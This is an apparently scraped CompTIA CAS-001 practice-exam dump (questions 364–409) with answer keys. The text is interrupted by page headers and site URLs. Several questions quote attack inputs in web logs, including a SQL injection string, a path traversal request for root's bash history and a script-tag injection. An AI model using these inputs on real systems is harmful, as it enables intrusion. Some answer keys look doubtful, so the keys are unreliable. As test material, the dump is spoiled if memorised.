QUESTION 364The security administrator of a large enterprise is tasked with installing and configuring a solution that will allow the company to inspect HTTPS traffic for signs ofhidden malware and to detect data exfiltration over encrypted channels. After installing a transparent proxy server, the administrator is ready to configure theHTTPS traffic inspection engine and related network equipment. Which of the following should the security administrator implement as part of the network andproxy design to ensure the browser will not display any certificate errors when browsing HTTPS sites? (Select

Real 199CompTIA CAS-001 ExamTHREE).

A. Install a self-signed Root CA certificate on the proxy server.B. The proxy configuration of all users' browsers must point to the proxy IP.C. TCP port 443 requests must be redirected to TCP port 80 on the web server.D. All users' personal certificates' public key must be installed on the proxy.E. Implement policy-based routing on a router between the hosts and the Internet.F. The proxy certificate must be installed on all users' browsers.

Correct Answer: AEFSection: (none)

Page 193: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation

Explanation/Reference:Explanation:

QUESTION 365A developer has implemented a piece of client-side JavaScript code to sanitize a user's provided input to a web page login screen. The code ensures that only theupper case and lower case letters are entered in the username field, and that only a 6-digit PIN is entered in the password field. A security administrator isconcerned with the following web server log:

10.235.62.11 - [02/Mar/2014:06:13:04] "GET/site/script.php?user=admin&pass=pass%20or%201=1 HTTP/1.1" 200 5724

Given this log, which of the following is the security administrator concerned with and which fix should be implemented by the developer?

A. The security administrator is concerned with nonprintable characters being used to gain administrative access, and the developer should strip all nonprintablecharacters.

B. The security administrator is concerned with XSS, and the developer should normalize Unicode characters on the browser side.C. The security administrator is concerned with SQL injection, and the developer should implement server side input validation.D. The security administrator is concerned that someone may log on as the administrator, and the developer should ensure strong passwords are enforced.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 366The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP tabletop exercise. The Chief Information Officer (CIO) wants todetermine which additional controls

Real 200CompTIA CAS-001 Exammust be implemented to reduce the risk of an extended customer service outage due to the VoIP system being unavailable. Which of the following BEST describesthe scenario presented and the document the ISO is reviewing?

A. The ISO is evaluating the business implications of a recent telephone system failure within the BIA.B. The ISO is investigating the impact of a possible downtime of the messaging system within the RA.C. The ISO is calculating the budget adjustment needed to ensure audio/video system redundancy within the RFQ.

Page 194: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. The ISO is assessing the effect of a simulated downtime involving the telecommunication system within the AAR.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 367The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. Internal services that arenormally available to the public via the Internet are inaccessible, and employees in the office are unable to browse the Internet. The senior security engineer startsby reviewing the bandwidth at the border router, and notices that the incoming bandwidth on the router's external interface is maxed out. The security engineer theninspects the following piece of log to try and determine the reason for the downtime, focusing on the company's external router's IP which is 128.20.176.19:

11:16:22.110343 IP 90.237.31.27.19 > 128.20.176.19.19: UDP, length 1400

11:16:22.110351 IP 23.27.112.200.19 > 128.20.176.19.19: UDP, length 1400

11:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 1400

11:16:22.110402 IP 70.192.2.55.19 > 128.20.176.19.19: UDP, length 1400

11:16:22.110406 IP 112.201.7.39.19 > 128.20.176.19.19: UDP, length 1400

Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration?

A. After the senior engineer used a network analyzer to identify an active Fraggle attack, the company's ISP should be contacted and instructed to block themalicious packets.

B. After the senior engineer used the above IPS logs to detect the ongoing DDOS attack, an IPS filter should be enabled to block the attack and restorecommunication.

C. After the senior engineer used a mirror port to capture the ongoing amplification attack, a BGP Real 201CompTIA CAS-001 Examsinkhole should be configured to drop traffic at the source networks.

D. After the senior engineer used a packet capture to identify an active Smurf attack, an ACL should be placed on the company's external router to block incomingUDP port 19 traffic.

Correct Answer: ASection: (none)Explanation

Page 195: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 368A security administrator is tasked with implementing two-factor authentication for the company VPN. The VPN is currently configured to authenticate VPN usersagainst a backend RADIUS server. New company policies require a second factor of authentication, and the Information Security Officer has selected PKI as thesecond factor. Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor andensure that no error messages are displayed to the user during the VPN connection? (Select TWO).

A. The user's certificate private key must be installed on the VPN concentrator.B. The CA's certificate private key must be installed on the VPN concentrator.C. The user certificate private key must be signed by the CA.D. The VPN concentrator's certificate private key must be signed by the CA and installed on the VPN concentrator.E. The VPN concentrator's certificate private key must be installed on the VPN concentrator.F. The CA's certificate public key must be installed on the VPN concentrator.

Correct Answer: EFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 369A security engineer is troubleshooting a possible virus infection, which may have spread to multiple desktop computers within the organization. The companyimplements enterprise antivirus software on all desktops, but the enterprise antivirus server's logs show no sign of a virus infection. The border firewall logs showsuspicious activity from multiple internal hosts trying to connect to the same external IP address. The security administrator decides to post the firewall logs to asecurity mailing list and receives confirmation from other security administrators that the firewall logs indicate internal hosts are compromised with a new variant ofthe Trojan.Ransomcrypt.G malware not yet detected by most antivirus software. Which of the following would have detected the malware infection sooner?

A. The security administrator should consider deploying a signature-based intrusion detection Real 202CompTIA CAS-001 Examsystem.

B. The security administrator should consider deploying enterprise forensic analysis tools.C. The security administrator should consider installing a cloud augmented security service.D. The security administrator should consider establishing an incident response team.

Correct Answer: CSection: (none)

Page 196: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation

Explanation/Reference:Explanation:

QUESTION 370The security administrator finds unauthorized tables and records, which were not present before, on a Linux database server. The database server communicatesonly with one web server, which connects to the database server via an account with SELECT only privileges. Web server logs show the following:

90.76.165.40 - [08/Mar/2014:10:54:04] "GET calendar.php?create%20table%20hidden HTTP/1.1" 200 5724

90.76.165.40 - [08/Mar/2014:10:54:05] "GET ../../../root/.bash_history HTTP/1.1" 200 5724

90.76.165.40 - [08/Mar/2014:10:54:04] "GET index.php?user=<script>Create</script> HTTP/1.1" 200 5724

The security administrator also inspects the following file system locations on the database server using the command `ls -al /root'

drwxrwxrwx 11 root root 4096 Sep 28 22:45 .

drwxr-xr-x 25 root root 4096 Mar 8 09:30 ..

-rws------ 25 root root 4096 Mar 8 09:30 .bash_history

-rw------- 25 root root 4096 Mar 8 09:30 .bash_history

-rw------- 25 root root 4096 Mar 8 09:30 .profile

-rw------- 25 root root 4096 Mar 8 09:30 .ssh

Which of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future?(Select TWO).

A. Privilege escalationB. Brute force attackC. SQL injectionD. Cross-site scriptingE. Using input validation, ensure the following characters are sanitized. <> Real 203

CompTIA CAS-001 ExamF. Update crontab with: find / \( -perm -4000 \) type f print0 | xargs -0 ls l | email.shG. Implement the following PHP directive: $clean_user_input = addslashes($user_input)

Page 197: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

H. Set an account lockout policy

Correct Answer: AFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 371A large international business has completed the acquisition of a small business and it is now in the process of integrating the small business' IT department. Bothparties have agreed that the large business will retain 95% of the smaller business' IT staff. Additionally, the larger business has a strong interest in specificprocesses that the smaller business has in place to handle its regional interests. Which of the following IT security related objectives should the small business' ITstaff consider reviewing during the integration process? (Select TWO).

A. How the large business operational procedures are implemented.B. The memorandum of understanding between the two businesses.C. New regulatory compliance requirements.D. Service level agreements between the small and the large business.E. The initial request for proposal drafted during the merger.F. The business continuity plan in place at the small business.

Correct Answer: ACSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 372The Information Security Officer (ISO) is reviewing new policies that have been recently made effective and now apply to the company. Upon review, the ISOidentifies a new requirement to implement two-factor authentication on the company's wireless system. Due to budget constraints, the company will be unable toimplement the requirement for the next two years. The ISO is required to submit a policy exception form to the Chief Information Officer (CIO). Which of thefollowing are MOST important to include when submitting the exception form? (Select THREE).

A. Business or technical justification for not implementing the requirements.B. Risks associated with the inability to implement the requirements.C. Industry best practices with respect to the technical implementation of the current controls.D. All section of the policy that may justify non-implementation of the requirements.

Page 198: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

E. A revised DRP and COOP plan to the exception form.F. Internal procedures that may justify a budget submission to implement the new requirement.

Real 204CompTIA CAS-001 Exam

G. Current and planned controls to mitigate the risks.

Correct Answer: ABGSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 373The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. The DMZ designmust support security in depth, change management and configuration processes, and support incident reconstruction. Which of the following designs BESTsupports the given requirements?

A. A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator.B. A single firewall DMZ where each firewall interface is managed by a separate administrator and logging to the cloud.C. A SaaS based firewall which logs to the company's local storage via SSL, and is managed by the change control team.D. A virtualized firewall, where each virtual instance is managed by a separate administrator and logging to the same hardware.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 374Company A needs to export sensitive data from its financial system to company B's database, using company B's API in an automated manner. Company A's policyprohibits the use of any intermediary external systems to transfer or store its sensitive data, therefore the transfer must occur directly between company A's financialsystem and company B's destination server using the supplied API. Additionally, company A's legacy financial software does not support encryption, while companyB's API supports encryption. Which of the following will provide end-to-end encryption for the data transfer while adhering to these requirements?

A. Company A must install an SSL tunneling service on the financial system.B. Company A's security administrator should use an HTTPS capable browser to transfer the data.C. Company A should use a dedicated MPLS circuit to transfer the sensitive data to company B.

Page 199: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Company A and B must create a site-to-site IPSec VPN on their respective firewalls.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Real 205CompTIA CAS-001 Exam

Explanation:

QUESTION 375Ann, a software developer, wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a thirdparty or end users before being installed on mobile devices. Which of the following should Ann implement to stop modified copies of her software form running onmobile devices?

A. Single sign-onB. Identity propagationC. Remote attestationD. Secure code review

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 376A vulnerability research team has detected a new variant of a stealth Trojan that disables itself when it detects that it is running on a virtualized environment. Theteam decides to use dedicated hardware and local network to identify the Trojan's behavior and the remote DNS and IP addresses it connects to. Which of thefollowing tools is BEST suited to identify the DNS and IP addresses the stealth Trojan communicates with after its payload is decrypted?

A. HIDSB. Vulnerability scannerC. Packet analyzerD. Firewall logsE. Disassembler

Page 200: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 377A system administrator is troubleshooting a possible denial of service on a sensitive system. The system seems to run properly for a few hours after it is restarted,but then it suddenly stops

Real 206CompTIA CAS-001 Examprocessing transactions. The system administrator suspects an internal DoS caused by a disgruntled developer who is currently seeking a new job while stillworking for the company. After looking into various system logs, the system administrator looks at the following output from the main system service responsible forprocessing incoming transactions.

DATE/TIMEPIDCOMMAND%CPUMEM

031020141030002055com.proc10.2920K

031020141100002055com.proc12.35.2M

031020141230002055com.proc22.022M

031020141300002055com.proc33.01.6G

031020141330002055com.proc30.28.0G

Which of the following is the MOST likely cause for the DoS?

A. The system does not implement proper garbage collection.B. The system is susceptible to integer overflow.C. The system does not implement input validation.D. The system does not protect against buffer overflows properly.

Correct Answer: ASection: (none)Explanation

Page 201: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 378The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation. The documentation shows that a single 24 hours downtime in a criticalbusiness function will cost the business $2.3 million. Additionally, the business unit which depends on the critical business function has determined that there is ahigh probability that a threat will materialize based on historical data. The CIO's budget does not allow for full system hardware replacement in case of acatastrophic failure, nor does it allow for the purchase of additional compensating controls. Which of the following should the CIO recommend to the finance directorto minimize financial loss?

A. The company should mitigate the risk.B. The company should transfer the risk.C. The company should avoid the risk.D. The company should accept the risk.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Real 207CompTIA CAS-001 Exam

Explanation:

QUESTION 379Which of the following activities is commonly deemed "OUT OF SCOPE" when undertaking a penetration test?

A. Test password complexity of all login fields and input validation of form fieldsB. Reverse engineering any thick client software that has been provided for the testC. Undertaking network-based denial of service attacks in production environmentD. Attempting to perform blind SQL injection and reflected cross-site scripting attacksE. Running a vulnerability scanning tool to assess network and host weaknesses

Correct Answer: CSection: (none)Explanation

Explanation/Reference:

Page 202: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation:

QUESTION 380A sensitive database needs its cryptographic integrity upheld. Which of the following controls meets this goal? (Select TWO).

A. Data signingB. EncryptionC. Perfect forward secrecyD. SteganographyE. Data vaultingF. RBACG. Lock and key

Correct Answer: AFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 381Some mobile devices are jail-broken by connecting via USB cable and then exploiting software vulnerabilities to get kernel-level access. Which of the followingattack types represents this scenario? (Select TWO).

Real 208CompTIA CAS-001 Exam

A. Session management attackB. Protocol fuzzingC. Root-kit compromiseD. Physical attackE. Privilege escalationF. Man-in-the-middle

Correct Answer: DESection: (none)Explanation

Page 203: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:well explained.

QUESTION 382A security company is developing a new cloud-based log analytics platform. Its purpose is to allow:

Customers to upload their log files to the "big data" platform

Customers to perform remote log search

Customers to integrate into the platform using an API so that third party business intelligence tools can be used for the purpose of trending, insights, and/ordiscovery

Which of the following are the BEST security considerations to protect data from one customer being disclosed to other customers? (Select THREE).

A. Secure storage and transmission of API keysB. Secure protocols for transmission of log files and search resultsC. At least two years retention of log files in case of e-discovery requestsD. Multi-tenancy with RBAC supportE. Sanitizing filters to prevent upload of sensitive log file contentsF. Encrypted storage of all customer log files

Correct Answer: ABDSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 383A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors. Which of thefollowing controls has likely been implemented by the developers?

Real 209CompTIA CAS-001 Exam

A. SSL certificate revocationB. SSL certificate pinningC. Mobile device root-kit detection

Page 204: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Extended Validation certificates

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 384During a software development project review, the cryptographic engineer advises the project manager that security can be greatly improved by significantly slowingdown the runtime of a hashing algorithm and increasing the entropy by passing the input and salt back during each iteration. Which of the following BEST describeswhat the engineer is trying to achieve?

A. Monoalphabetic cipherB. ConfusionC. Root of trustD. Key stretchingE. Diffusion

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 385The threat abatement program manager tasked the software engineer with identifying the fastest implementation of a hash function to protect passwords with theleast number of collisions. Which of the following should the software engineer implement to best meet the requirements?

A. hash = sha512(password + salt);for (k = 0; k < 4000; k++) {hash = sha512 (hash);}

B. hash = md5(password + salt);for (k = 0; k < 5000; k++) {hash = md5 (hash);}

Page 205: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. hash = sha512(password + salt);for (k = 0; k < 3000; k++) {hash = sha512 (hash + password + salt);Real 210CompTIA CAS-001 Exam}

D. hash1 = sha1(password + salt);hash = sha1 (hash1);

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 386A security engineer at a bank has detected a Zeus variant, which relies on covert communication channels to receive new instructions and updates from themalware developers. As a result, NIPS and AV systems did not detect the configuration files received by staff in emails that appeared as normal files. Which of thefollowing BEST describes the technique used by the malware developers?

A. Perfect forward secrecyB. StenographyC. DiffusionD. ConfusionE. Transport encryption

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 387A security engineer wants to implement forward secrecy but still wants to ensure the number of requests handled by the web server is not drastically reduced due tothe larger computational overheads. Browser compatibility is not a concern; however system performance is. Which of the following, when implemented, wouldBEST meet the engineer's requirements?

A. DHE

Page 206: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. ECDHEC. AES128-SHAD. DH

Correct Answer: BSection: (none)Explanation

Explanation/Reference:

QUESTION 388An IT administrator has been tasked by the Chief Executive Officer with implementing security using a single device based on the following requirements:

1. Selective sandboxing of suspicious code to determine malicious intent.

2. VoIP handling for SIP and H.323 connections.

3. Block potentially unwanted applications.

Which of the following devices would BEST meet all of these requirements?

A. UTMB. HIDSC. NIDSD. WAFE. HSM

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 389The Chief Executive Officer (CEO) has asked the IT administrator to protect the externally facing web server from SQL injection attacks and ensure the backenddatabase server is monitored for unusual behavior while enforcing rules to terminate unusual behavior. Which of the following would BEST meet the CEO'srequirements?

Page 207: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. WAF and DAMB. UTM and NIDSC. DAM and SIEMD. UTM and HSME. WAF and SIEM

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 390The risk manager has requested a security solution that is centrally managed, can easily be

Real 212CompTIA CAS-001 Examupdated, and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of thefollowing would BEST meet this requirement?

A. HIPSB. UTMC. AntivirusD. NIPSE. DLP

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 391An IT administrator has been tasked with implementing an appliance-based web proxy server to control external content accessed by internal staff. Concerned withthe threat of corporate data leakage via web-based email, the IT administrator wants to decrypt all outbound HTTPS sessions and pass the decrypted content to anICAP server for inspection by the corporate DLP software. Which of the following is BEST at protecting the internal certificates used in the decryption process?

Page 208: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. NIPSB. HSMC. UTMD. HIDSE. WAFF. SIEM

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 392A security manager is concerned about performance and patch management, and, as a result, wants to implement a virtualization strategy to avoid potential futureOS vulnerabilities in the host system. The IT manager wants a strategy that would provide the hypervisor with direct communications with the underlying physicalhardware allowing the hardware resources to be paravirtualized and delivered to the guest machines. Which of the following recommendations from the serveradministrator BEST meets the IT and security managers' requirements? (Select TWO).

Real 213CompTIA CAS-001 Exam

A. Nested virtualized hypervisorsB. Type 1 hypervisorC. Hosted hypervisor with a three layer software stackD. Type 2 hypervisorE. Bare metal hypervisor with a software stack of two layers

Correct Answer: BESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 393Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote codeexecution in the context of the victim's privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of

Page 209: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

the following BEST describes the application issue?

A. Integer overflowB. Click-jackingC. Race conditionD. SQL injectionE. Use after freeF. Input validation

Correct Answer: ESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 394A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. The doctors and specialistsaccess patient records over the hospital's guest WiFi network which is isolated from the internal network with appropriate security controls. The patient recordsmanagement system can be accessed from the guest network and requires two factor authentication. Using a remote desktop type interface, the doctors andspecialists can interact with the hospital's system. Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. Which of thefollowing are of MOST concern? (Select TWO).

A. Privacy could be compromised as patient records can be viewed in uncontrolled areas.B. Device encryption has not been enabled and will result in a greater likelihood of data loss.C. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data.

Real 214CompTIA CAS-001 Exam

D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes.E. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable.

Correct Answer: ADSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 395

Page 210: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A high-tech company dealing with sensitive data seized the mobile device of an employee suspected of leaking company secrets to a competitive organization.Which of the following is the BEST order for mobile phone evidence extraction?

A. Device isolation, evidence intake, device identification, data processing, verification of data accuracy, documentation, reporting, presentation and archival.B. Evidence intake, device identification, preparation to identify the necessary tools, device isolation, data processing, verification of data accuracy, documentation,

reporting, presentation and archival.C. Evidence log, device isolation ,device identification, preparation to identify the necessary tools, data processing, verification of data accuracy, presentation and

archival.D. Device identification, evidence log, preparation to identify the necessary tools, data processing, verification of data accuracy, device isolation, documentation,

reporting, presentation and archival.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 396A company is in the process of implementing a new front end user interface for its customers, the goal is to provide them with more self service functionality. Theapplication has been written by developers over the last six months and the project is currently in the test phase.

Which of the following security activities should be implemented as part of the SDL in order to provide the MOST security coverage over the solution? (SelectTWO).

A. Perform unit testing of the binary codeB. Perform code review over a sampling of the front end source codeC. Perform black box penetration testing over the solutionD. Perform grey box penetration testing over the solutionE. Perform static code review over the front end source code

Correct Answer: DESection: (none)Explanation

Explanation/Reference:Real 215CompTIA CAS-001 Exam

Page 211: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation:

QUESTION 397A company is in the process of outsourcing its customer relationship management system to a cloud provider. It will host the entire organization's customerdatabase. The database will be accessed by both the company's users and its customers. The procurement department has asked what security activities must beperformed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO).

A. Physical penetration test of the datacenter to ensure there are appropriate controls.B. Penetration testing of the solution to ensure that the customer data is well protected.C. Security clauses are implemented into the contract such as the right to audit.D. Review of the organizations security policies, procedures and relevant hosting certifications.E. Code review of the solution to ensure that there are no back doors located in the software.

Correct Answer: CDSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 398A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter theircredit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?

A. Client side input validationB. Stored procedureC. Encrypting credit card detailsD. Regular expression matching

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 399The audit department at a company requires proof of exploitation when conducting internal

Page 212: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Real 216CompTIA CAS-001 Examnetwork penetration tests. Which of the following provides the MOST conclusive proof of compromise without further compromising the integrity of the system?

A. Provide a list of grabbed service banners.B. Modify a file on the system and include the path in the test's report.C. Take a packet capture of the test activity.D. Add a new test user account on the system.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 400A security administrator was doing a packet capture and noticed a system communicating with an address within the 2001::/32 prefix. The network administratorconfirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action?

A. Investigate the network traffic and block UDP port 3544 at the firewallB. Remove the system from the network and disable IPv6 at the routerC. Locate and remove the unauthorized 6to4 relay from the networkD. Disable the switch port and block the 2001::/32 traffic at the firewall

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 401An organization is finalizing a contract with a managed security services provider (MSSP) that is responsible for primary support of all security technologies. Whichof the following should the organization require as part of the contract to ensure the protection of the organization's technology?

A. An operational level agreementB. An interconnection security agreementC. A non-disclosure agreement

Page 213: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. A service level agreement

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Real 217CompTIA CAS-001 Exam

QUESTION 402An administrator is trying to categorize the security impact of a database server in the case of a security event. There are three databases on the server.

Current Financial Data = High level of damage if data is disclosed. Moderate damage if the system goes offline

Archived Financial Data = No need for the database to be online. Low damage for integrity loss

Public Website Data = Low damage if the site goes down. Moderate damage if the data is corrupted

Given these security categorizations of each database, which of the following is the aggregate security categorization of the database server?

A. Database server = {(Confidentiality HIGH),(Integrity High),(Availability High)}B. Database server = {(Confidentiality HIGH),(Integrity Moderate),(Availability Moderate)}C. Database server = {(Confidentiality HIGH),(Integrity Moderate),(Availability Low)}D. Database server = {(Confidentiality Moderate),(Integrity Moderate),(Availability Moderate)}

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 403Every year, the accounts payable employee, Ann, takes a week off work for a vacation. She typically completes her responsibilities remotely during this week.Which of the following policies, when implemented, would allow the company to audit this employee's work and potentially discover improprieties?

A. Job rotation

Page 214: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. Mandatory vacationsC. Least privilegeD. Separation of duties

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

Real 218CompTIA CAS-001 Exam

QUESTION 404A new web based application has been developed and deployed in production. A security engineer decides to use an HTTP interceptor for testing the application.Which of the following problems would MOST likely be uncovered by this tool?

A. The tool could show that input validation was only enabled on the client sideB. The tool could enumerate backend SQL database table and column namesC. The tool could force HTTP methods such as DELETE that the server has deniedD. The tool could fuzz the application to determine where memory leaks occur

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 405A security consultant is investigating acts of corporate espionage within an organization. Each time the organization releases confidential information to high-rankingengineers, the information is soon leaked to competing companies. Which of the following techniques should the consultant use to discover the source of theinformation leaks?

A. Digital watermarkingB. SteganographyC. Enforce non-disclosure agreementsD. Digital rights management

Page 215: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 406A security administrator is investigating the compromise of a SCADA network that is not physically connected to any other network. Which of the following is theMOST likely cause of the compromise?

A. Outdated antivirus definitionsB. Insecure wirelessC. Infected USB deviceD. SQL injection

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Real 219CompTIA CAS-001 Exam

Explanation:

QUESTION 407The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage; and realizes this is arisk to the company. In response, the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-basedstorage. Which of the following risk strategies did the CISO implement?

A. AvoidB. AcceptC. MitigateD. Transfer

Correct Answer: CSection: (none)Explanation

Page 216: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 408A security administrator is investigating the compromise of a software distribution website. Forensic analysis shows that several popular files are infected withmalicious code. However, comparing a hash of the infected files with the original, non-infected files which were restored from backup, shows that the hash is thesame. Which of the following explains this?

A. The infected files were using obfuscation techniques to evade detection by antivirus software.B. The infected files were specially crafted to exploit a collision in the hash function.C. The infected files were using heuristic techniques to evade detection by antivirus software.D. The infected files were specially crafted to exploit diffusion in the hash function.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 409A court order has ruled that your company must surrender all the email sent and received by a certain employee for the past five years. After reviewing the backupsystems, the IT administrator concludes that email backups are not kept that long. Which of the following policies MUST be

Real 220CompTIA CAS-001 Examreviewed to address future compliance?

A. Tape backup policiesB. Offsite backup policiesC. Data retention policiesD. Data loss prevention policies

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

Page 217: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

